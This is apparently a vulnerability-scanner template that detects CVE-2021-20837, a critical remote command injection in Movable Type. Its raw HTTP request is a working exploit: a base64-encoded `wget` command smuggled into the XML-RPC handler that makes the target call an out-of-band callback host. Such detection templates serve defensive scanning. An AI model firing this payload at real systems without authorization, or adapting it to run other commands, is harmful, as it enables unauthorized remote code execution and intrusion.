id: CVE-2021-20837 info: name: MovableType - Remote Command Injection author: dhiyaneshDK,hackergautam severity: critical description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType. reference: - https://nemesis.sh/posts/movable-type-0day/ - https://github.com/ghost-nemesis/cve-2021-20837-poc - https://twitter.com/cyber_advising/status/1454051725904580608 - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 - http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20837 cwe-id: CWE-78 epss-score: 0.96998 epss-percentile: 0.99689 cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* metadata: max-request: 1 vendor: sixapart product: movable_type tags: cve2021,cve,packetstorm,rce,movable,sixapart http: - raw: - | POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml mt.handler_to_coderef {{base64("`wget http://{{interactsh-url}}`")}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word words: - "failed loading package" - type: status status: - 200 # digest: 4b0a00483046022100d0675892f5cec9c4449982110497fde27efa75037b1885e51f4b4dcf0340a1db022100c191c1f76092756f549a6f2692918433952d4d0a25a3c7f4833c36650fa39e9d:922c64590222798bb761d5b6d8e72950